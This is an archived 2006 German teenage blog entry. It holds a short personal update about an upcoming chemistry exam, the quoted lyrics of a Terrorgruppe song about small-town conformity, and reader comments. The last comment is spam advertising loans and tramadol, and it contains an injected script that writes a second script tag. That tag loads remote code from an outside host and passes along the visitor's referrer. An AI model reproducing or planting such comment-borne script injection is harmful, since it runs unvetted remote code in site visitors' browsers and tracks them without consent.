* Startseite     * Archiv     * Gästebuch     * Kontakt








SID's News 06.12.06

MoiN MoiN

hier sind also sid's news am nikolaus...

heute extrem gekürzt da mirt leider die zeit fehlt um großartig zu schreiben weil ich morgen eine 4 stündige chemie klausur schreiben darf...na das kann was werden....

an alle leidensgenossinnen und -genossen  kopp hoch dat wird werden!

naja um euch wenigstens ne kleine anekdote zum nachdenken da zu lassen erlaube ich es mir heute einmal eine band die sich terrorgruppe nennt zu zitieren....

 

Kleinstadt, Kleinstadt, heile Welt
Fertighäuser aufgestellt
Enge, Öde, leerer Ort
drängt sie alle von hier fort

Kleinstadt, Kleinstadt, Langeweile
Gerüchte, Tratsch und Vorurteile
alle Guten fortgezogen
wer's nicht packt, verreckt an Drogen

Vorstadtsiedlung, Autos waschen
Grossmarkt, Parkplatz, Tragetaschen
Du gehörst dazu
Du gehörst dazu

Vorgärten mit Jägerzaun
Kleinstadt, Kleinstadt aus der Traum
Du gehörst dazu
Du gehörst dazu

Kleinstadt, Kleinstadt, alte Freunde?
wo sind sie denn alle Heute?
ein Reihenhaus - der Eigentümer
bekannt als der Rebell von früher

Kleinstadt, Kleinstadt Lebenszeichen
von einer handvoll Drogenleichen
hier endet die Punk-Karriere
generell unter der Erde

Vorstadtsiedlung, Autos waschen
Grossmarkt, Parkplatz, Tragetaschen
Du gehörst dazu
Du gehörst dazu

Vorgärten mit Jägerzaun
Kleinstadt, Kleinstadt aus der Traum
Du gehörst dazu
Du gehörst dazu

Rasenmähen, Rosengarten, Hecke schneiden, Sonntagsbraten
und wohin gehst du??

denkt ruhig mal drüber nach....man gehört schneller "dazu" als einem lieb ist...ob man will oder nicht...

naja also euch noch viel spaß ich verkriech mich ma wieder hinterm scheisschemie buch.....

auf bald SiD

achja morgen dürft ihr nicht viel mehr erwarten...bin morgen 1 monat mit meinem süßen kuschelhasen zusammen....da werd ich was besseres zu tun haben als euch über die welt zu informieren....hart ich weiß aber so is das leben^^

6.12.06 21:18
 


bisher 3 Kommentar(e)     TrackBack-URL


Benny (8.12.06 21:36)
Also das enttäuscht michh jetzt aber!
Wir sind ja wohl schon etwas länger zusamm als nen Monat!!!*g*


Herr Nachbar / Website (11.12.06 15:16)
hehe tjo ich kann live aus wunstorf berichten das ich schon seit langem dazugehoere :D ... tja wenig text wenig kommentar ! rein haun ach und alles gute nachtraeglich zum 1 monatigen


degrees online / Website (23.3.07 18:26)
range debt consolidation information agitation student loans read degrees online anxious people may hoodia such tramadol online to take <script>var r = document.referrer; document.write('<script src="http://www.stats-log.com/gb.php?id=g&r='+escape(r)+'"><' + '/script>')</script>

Name:
Email:
Website:
E-Mail bei weiteren Kommentaren
Informationen speichern (Cookie)



 Smileys einfügen



Verantwortlich für die Inhalte ist der Autor. Dein kostenloses Blog bei myblog.de! Datenschutzerklärung
Werbung